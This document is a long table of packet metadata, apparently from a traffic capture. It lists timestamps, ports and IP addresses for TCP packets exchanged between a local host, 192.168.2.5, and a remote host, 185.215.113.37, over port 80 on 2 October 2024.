Oct 2, 2024 23:10:13.363055944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363070965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363074064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363085032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363090992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363146067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363487959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363828897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363846064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363857985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363866091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363873005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363881111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363887072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363894939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363908052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363922119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363929033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363950014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363959074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363965034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.363959074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363960028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.363960028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364054918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364056110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364733934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364748955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364762068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364775896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364785910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364790916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364801884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364805937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364820004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364835024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364840984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364856005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364870071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364871979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364871979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364881039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364885092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.364903927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.364918947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365680933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365695953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365710020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365724087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365731955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365739107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365751028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365753889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365767956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365767956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365788937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365793943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365803957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365816116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365819931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365833998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365837097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365845919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365849972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.365875006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.365926981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366403103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366456985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366621017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366636992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366650105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366664886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366678953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366684914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366693974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366709948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366724968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366739988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366750956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366750956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366754055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366751909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366767883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366782904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366786003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366786003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366796970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.366816044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366816044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366835117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.366852999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367552042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367567062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367580891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367594957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367605925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367609024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367624044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367628098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367640018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367651939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367655039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367669106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367676973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367685080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367686987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367698908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367712975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.367713928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367722988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367743969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.367757082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368431091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368446112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368474960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368484020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368490934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368505001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368515968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368520975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368535042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368540049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368549109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368550062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368565083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368577957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368580103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368594885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368602991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368609905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.368627071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.368652105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369338036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369353056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369365931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369379997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369393110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369393110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369401932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369409084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369424105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369438887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369438887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369450092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369452953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369471073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369474888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369499922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369503975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369522095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369535923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369544983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369550943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.369580984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.369590044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370299101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370313883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370327950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370342016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370348930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370357990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370364904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370373011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370388031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370388985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370403051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370417118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370430946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370434999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370434999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370445013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370451927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370460033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370474100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370476007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370486021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370488882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.370522976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370522976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.370534897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.371177912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.371192932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.371206999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.371229887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.371244907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382373095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382389069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382402897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382432938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382457018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382499933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382514954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382529020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382543087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382544041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382571936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382595062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382757902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382802010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382855892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382870913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382882118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382894993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382895947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382904053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382913113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382914066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382926941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382935047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382942915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.382949114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382961988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.382983923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383291960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383306980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383346081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383346081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383366108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383397102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383402109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383414030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383429050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383438110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383446932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383469105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383603096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383618116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383630991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383645058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383750916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383891106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383904934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383918047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383932114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383938074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383949041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.383965969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.383989096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384186983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384200096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384212971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384227037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384238005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384248972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384254932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384268999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384269953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384283066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384293079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384296894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384304047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384310961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384324074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384332895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384345055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384807110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384855986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384887934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384902954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.384934902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.384934902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385021925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385035992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385050058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385063887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385066032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385078907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385078907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385091066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385091066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385102987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385112047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385128975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385361910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385375023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385387897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385409117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385413885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385427952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385432005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385442019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385452986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385457039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385466099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385469913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385473967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385484934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385490894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385498047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385507107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385518074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385528088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385540009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385545969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385555029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.385565996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385584116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.385591984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386235952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386250019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386262894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386276007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386285067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386291027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386303902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386306047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386317968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386328936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386332035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386346102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386348009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386358976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386373997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386374950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386389017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386389971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386404991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386415005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386434078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386456966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.386893034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.386945963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387007952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387022018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387034893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387048960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387061119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387061119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387074947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387082100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.387089968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387104034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.387104034 CEST	49704	80	192.168.2.5	185.215.113.37
